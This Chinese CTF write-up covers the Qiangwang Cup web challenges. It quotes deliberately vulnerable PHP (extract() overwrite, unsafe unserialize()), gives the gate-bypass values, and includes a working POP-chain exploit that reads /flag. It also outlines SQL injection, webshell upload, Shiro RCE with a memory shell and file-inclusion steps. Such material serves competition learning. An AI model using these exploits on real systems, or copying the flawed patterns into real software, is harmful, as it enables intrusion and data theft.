
第五屆強網杯WEB Writeup

WEB

0x01 [強網先鋒]尋寶

根據題目資訊可以知道,需要從中獲取兩個KEY,然後獲得flag

題目原始碼

<?php
// Emit a UTF-8 HTML response, silence every PHP diagnostic, and print this
// file's own source so the visitor can read the checks that follow.
header('Content-type:text/html;charset=utf-8');
error_reporting(0);
highlight_file(__FILE__);

/**
 * Strip a fixed denylist of substrings from $string.
 *
 * All entries are joined into one alternation and removed in a single
 * preg_replace pass; the result is not re-scanned, so removal is not
 * repeated on whatever the first pass leaves behind. The pattern carries
 * no flags, so matching is case-sensitive ('key' is stripped, 'KEY' is not).
 * A single-pass strip like this is a cosmetic control, not input validation.
 *
 * @param string $string raw value (in this file it originates from $_POST)
 * @return string|null the stripped string, or null when preg_replace fails
 */
function filter($string){
    $blocked = ['php','flag','index','KeY1lhv','source','key','eval','echo','\$','\(','\.','num','html','\/','\,','\'','0000000'];
    // Entries that collide with regex syntax are already escaped in the list.
    $pattern = sprintf('/%s/', implode('|', $blocked));
    return preg_replace($pattern, '', $string);
}


// Defaults for the five checked fields. The third key is spelled 'nunber3',
// so 'number3' has no default unless the request supplies one.
if($ppp){
    unset($ppp);
}
$ppp = [
    'number1' => "1",
    'number2' => "1",
    'nunber3' => "1",
    'number4' => '1',
    'number5' => '1',
];

// extract() turns every POST field into a variable of the same name, so a
// request field called "ppp" replaces the defaults above wholesale. Reading
// the fields explicitly (e.g. $_POST['ppp']['number1'] ?? '1') would keep
// the request from touching any other variable in this scope.
extract($_POST);

$num1 = filter($ppp['number1']);
$num2 = filter($ppp['number2']);
$num3 = filter($ppp['number3']);
$num4 = filter($ppp['number4']);
$num5 = filter($ppp['number5']);

// Gate 1: the value must not be numeric, yet must still compare greater than 1024.
if (isset($num1) && is_numeric($num1)) {
    die("非數字");
}
if (!($num1 > 1024)) {
    die("no111");
}
echo "第一層";

// Gate 2: at most 4 characters, but intval($num2 + 1) must exceed 500000.
if (!(isset($num2) && strlen($num2) <= 4 && intval($num2 + 1) > 500000)) {
    die("no");
}
echo "第二層";

// Gate 3: md5($num3) must begin with the 7 hex digits 4bf21cd.
if (!(isset($num3) && '4bf21cd' === substr(md5($num3), 0, 7))) {
    die("no");
}
echo "第三層";

// Gate 4: exactly 7 characters that loosely (==) equal 0 and are neither below nor above 0.
if (!(!($num4 < 0) && ($num4 == 0) && ($num4 <= 0) && (strlen($num4) > 6) && (strlen($num4) < 8) && isset($num4))) {
    die("no");
}
echo "第四層";

// Gate 5: a non-empty value that json_decode() cannot parse (it returns NULL).
if (!isset($num5) || (strlen($num5) == 0)) die("no");
$b = json_decode(@$num5);
if ($b !== NULL) {
    die("no");
}
echo "第五層";
include 'KeY1lhv.php';
echo $KEY1;

KEY1:

第一層,字串比較,構造$num1=1027a繞過

第二層,需要繞過 intval() ,使用科學計數法繞過 $num2=6e5

第三層,寫指令碼跑md5, $num3=61823470

import hashlib

def md5_encode(num3):
    """Return the first 7 hex digits of the MD5 digest of ``num3`` (a str)."""
    digest = hashlib.md5(num3.encode())
    return digest.hexdigest()[:7]

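# Brute-force search for the first integer in the range whose MD5 prefix
# matches. The loop stops at the first hit, so the upper bound is only a cap;
# the for/else reports exhaustion instead of ending silently.
TARGET_PREFIX = '4bf21cd'
for i in range(60000000, 700000000):
    if md5_encode(str(i)) == TARGET_PREFIX:
        print(i)
        break
else:
    print('no match in range')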

第四層,同樣使用科學計數法繞過,構造$num4=0e00000

第五層,利用json_decode在解析非JSON格式資料時會回傳NULL的特性繞過,構造$num5=aaa

得到KEY1:KEY1{e1e1d3d40573127e9ee0480caf1283d6}

KEY2:

根據題目描述,使用支援自動分片下載的工具下載檔案

解壓後得到一堆docx檔案

隨便開啟一個發現是一堆字元,猜測KEY2就在其中某一個檔案中,寫指令碼跑


exp

import os
import docx

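# Walk ./5.<i>/VR_<j> for i, j in 1..19 and print the first paragraph of each
# .docx that contains "KEY2{", together with the file it came from.
# os.listdir() sat outside the try block, so one missing directory aborted
# the whole scan; missing directories are now skipped. The bare except is
# narrowed to Exception so Ctrl-C still stops the run.
for i in range(1, 20):
    for j in range(1, 20):
        path = "./5.{0}/VR_{1}".format(i, j)
        if not os.path.isdir(path):
            continue
        for name in os.listdir(path):
            file_name = path + "/" + name
            try:
                document = docx.Document(file_name)
            except Exception:
                # Not a readable .docx (or not a regular file); move on.
                continue
            for paragraph in document.paragraphs:
                if "KEY2{" in paragraph.text:
                    print(paragraph.text)
                    print(file_name)
                    break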

得到KEY2 : KEY2{T5fo0Od618l91SlG6l1l42l3a3ao1nblfsS}

在原頁面上提交獲取flag:

0x02 [強網先鋒]賭徒

根據提示掃目錄,在www.zip中得到原始碼


index.php

<meta charset="utf-8">
<?php
//hint is in hint.php
// Report fatal errors only (E_ERROR === 1).
error_reporting(E_ERROR);


/**
 * Entry object of the page. Two of its magic methods run without any explicit
 * call: __wakeup fires on unserialize() and echoes $name, and __get fires on
 * any read of an undeclared property and prints $flag. Neither validates
 * what the properties hold, which is what makes the class usable as a
 * gadget when an attacker controls the serialized form.
 */
class Start
{
    public $name='guest';
    public $flag='syst3m("cat 127.0.0.1/etc/hint");';

    // Printed when the page constructs the object directly.
    public function __construct(){
        print 'I think you need /etc/hint . Before this you need to see the source code';
    }

    // echo converts a non-string $name; for an object that means its __toString().
    public function _sayhello(){
        print $this->name;
        return 'ok';
    }

    // Runs right after unserialize(); $name is echoed before anything checks it.
    public function __wakeup(){
        print 'hi';
        $this->_sayhello();
    }

    // Reached for any property name that is not declared on this class.
    public function __get($cc){
        echo 'give you flag : ', $this->flag;
        return;
    }
}

/**
 * Holds a "promise" string. When cast to string it dereferences a path
 * through $file, which is not declared on the class, so whatever was stored
 * there (e.g. by unserialize()) decides what the cast does.
 */
class Info
{
    private $phonenumber=123123;
    public $promise='I do';

    // The constructor overwrites the declared default unconditionally.
    public function __construct(){
        $this->promise = 'I will not !!!!';
        return $this->promise;
    }

    // String cast: reads $this->file['filename'], then ->ffiillee['ffiilleennaammee'] on it.
    // If 'filename' holds an object with no declared ffiillee property, that read
    // goes through the object's own __get. __toString must end up with a string.
    public function __toString(){
        $target = $this->file['filename'];
        return $target->ffiillee['ffiilleennaammee'];
    }
}

/**
 * Reads a file and echoes it base64-encoded. Two magic methods make that
 * reachable without a direct call: __get invokes whatever callable sits in
 * $a, and __invoke runs Get_hint on $filename when the object itself is
 * called. A Room stored in its own $a therefore turns any undeclared
 * property read into a read of $filename.
 */
class Room
{
    public $filename='/flag';
    public $sth_to_set;
    public $a='';

    // Any undeclared property read ends up calling $this->a().
    public function __get($name){
        $callable = $this->a;
        return $callable();
    }

    // Echoes the base64 of the file at $file; returns null.
    public function Get_hint($file){
        echo base64_encode(file_get_contents($file));
        return;
    }

    // Makes the object callable; Get_hint's null result is echoed, which prints nothing.
    public function __invoke(){
        echo $this->Get_hint($this->filename);
    }
}

// Request boundary. The raw "hello" query parameter goes straight into
// unserialize(), so a client-supplied object graph is rebuilt here and its
// __wakeup/__toString/__get/__invoke handlers run. A safer design accepts
// plain data (json_decode) or at least passes ['allowed_classes' => false].
// Without the parameter a Start is built directly and its constructor prints the hint.
$hello = $_GET['hello'] ?? null;
if ($hello !== null) {
    unserialize($hello);
} else {
    $hi = new Start();
}

?>

分析原始碼後,發現是PHP反序列化漏洞,構造POP鏈如下

<?php
// Report fatal errors only (E_ERROR === 1) while the object graph is serialized.
error_reporting(E_ERROR);
/**
 * Local copy of index.php's Start, kept so serialize() produces the same
 * class name and property layout. $flag is not declared in this copy, so the
 * read in __get yields null (with a warning) rather than the string index.php has.
 */
class Start
{
    public $name='guest';

    // echo converts a non-string $name; for an object that means its __toString().
    public function _sayhello(){
        print $this->name;
        return 'ok';
    }

    // Runs right after unserialize(); $name is echoed before anything checks it.
    public function __wakeup(){
        print 'hi';
        $this->_sayhello();
    }

    // Reached for any property name that is not declared on this class.
    public function __get($cc){
        echo 'give you flag : ', $this->flag, "\n\n";
        return;
    }
}

/**
 * Local copy of index.php's Info without the private $phonenumber, so the
 * serialized object carries only $promise plus whatever dynamic properties
 * are attached before serialize().
 */
class Info
{
    public $promise='I do';

    // The constructor overwrites the declared default unconditionally.
    public function __construct(){
        $this->promise = 'I will not !!!!';
        return $this->promise;
    }

    // String cast: reads $this->file['filename'], then ->ffiillee['ffiilleennaammee'] on it.
    public function __toString(){
        $target = $this->file['filename'];
        return $target->ffiillee['ffiilleennaammee'];
    }
}

/**
 * Local copy of index.php's Room. __get invokes the callable stored in $a,
 * and __invoke runs Get_hint on $filename, so a Room stored in its own $a
 * turns any undeclared property read into a base64 dump of $filename.
 */
class Room
{
    public $filename='/flag';
    public $sth_to_set;
    public $a='';

    // Any undeclared property read ends up calling $this->a().
    public function __get($name){
        $callable = $this->a;
        return $callable();
    }

    // Echoes the base64 of the file at $file; returns null.
    public function Get_hint($file){
        echo base64_encode(file_get_contents($file));
        return;
    }

    // Makes the object callable; Get_hint's null result is echoed, which prints nothing.
    public function __invoke(){
        echo $this->Get_hint($this->filename);
    }
}

// Wire the three objects into the graph index.php walks after unserialize():
// Start::__wakeup echoes $name (an Info) -> Info::__toString reads
// $file['filename'] (the Room) -> its undeclared ffiillee goes to Room::__get
// -> $a() is the Room itself -> Room::__invoke -> Get_hint($filename).
$room  = new Room();
$info  = new Info();
$start = new Start();

$info->file['filename'] = $room;   // dynamic property; the string cast lands on the Room
$start->name            = $info;   // __wakeup echoes this Info
$room->a                = $room;   // __get calls the Room itself
$room->sth_to_set       = $start;  // carries the Start inside the serialized Room

echo serialize($room);
?>

base64解碼後得到flag(注:輸出前面有個hi,要先將其剔除再解碼)

0x03 EasyWeb

掃埠發現還有36842開放

登入頁面使用者名稱出存在sql注入,sqlmap一把梭,即可獲取使用者名稱,密碼

登入進後臺,掃目錄發現上傳路由

構造上傳,蟻劍連線

使用ew代理出來後掃描埠 ,發現8006開放著jboss服務

獲取flag

0x04 Hard_Penetration

Shiro RCE。注入記憶體馬後使用冰蠍連線,發現當前使用者為ctf,無法讀取flag;於是使用ew代理出來掃埠,在8005埠發現一個php站點,為TP3.1.3開發的CMS,審計原始碼後發現存在檔案包含

構造shell去包含

使用蟻劍連線,獲得flag